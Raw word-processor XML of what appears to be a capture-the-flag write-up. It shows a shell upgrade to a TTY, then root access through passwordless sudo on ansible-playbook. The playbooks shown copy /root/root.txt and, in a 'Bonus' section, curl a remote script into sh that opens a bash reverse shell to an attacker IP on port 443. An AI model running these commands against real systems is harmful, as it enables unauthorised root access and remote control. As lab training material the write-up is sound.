    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">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803400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594360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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6cgtjr78zlkz" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.wgqzzwjvighr" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.b4e052n73c66" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Upgrading the simple shell to a fully interactive TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">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python -c "import pty;pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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Ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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stty raw -echo; fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">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Enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export TERM=xterm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Navigating to the root directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">first flag</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39">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908300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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59436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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.k08d4f3excju" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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828800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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59436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execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/ansible-playbook</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with root privileges without a password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Ansible Playbooks provide simple, repeatable, and reusable configuration management in multi-machine deployment systems, well-suited for deploying complex applications. Playbooks define variables, configurations, deployment steps, assign roles, and perform various tasks such as copying/deleting files and folders, installing packages, and starting services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Playbooks are expressed in YAML format with minimal syntax and are executed from top to bottom. In each play, tasks are also executed sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Here, I will create a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">YAML </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file to read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</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40">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041">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hosts: localhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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become: true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">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tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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 name: Copy content to file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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copy: src=/root/root.txt dest=/tmp/vert16x.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano copy.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/ansible-playbook /tmp/copy.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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921000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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59436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133600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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59436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And we have our root flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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362200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.m0tf3kv267yh" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bonus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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also obtain a reverse shell and access the host as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.vj1q2tpb7rl" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">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052">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hosts: localhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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become: true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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 name: Revshell like a boss</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">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ansible.builtin.shell: curl http://&lt;IP&gt;/shell.sh | sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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args:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">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executable: /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP&gt;/443 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a Python server to host</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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057400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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59436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Open Netcat to listen on port 443.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">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019300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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Edit the</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.yaml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file on the host:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">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263900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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63">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sudo /usr/bin/ansible-playbook /tmp/shell.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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65">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006600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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And we get a root shell 😃</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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sectPr>
      <w:headerReference r:id="rId29" w:type="default"/>
      <w:headerReference r:id="rId30" w:type="first"/>
      <w:headerReference r:id="rId31" w:type="even"/>
      <w:footerReference r:id="rId32" w:type="default"/>
      <w:footerReference r:id="rId33" w:type="first"/>
      <w:footerReference r:id="rId34" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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IBM Plex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BM Plex Sans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widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
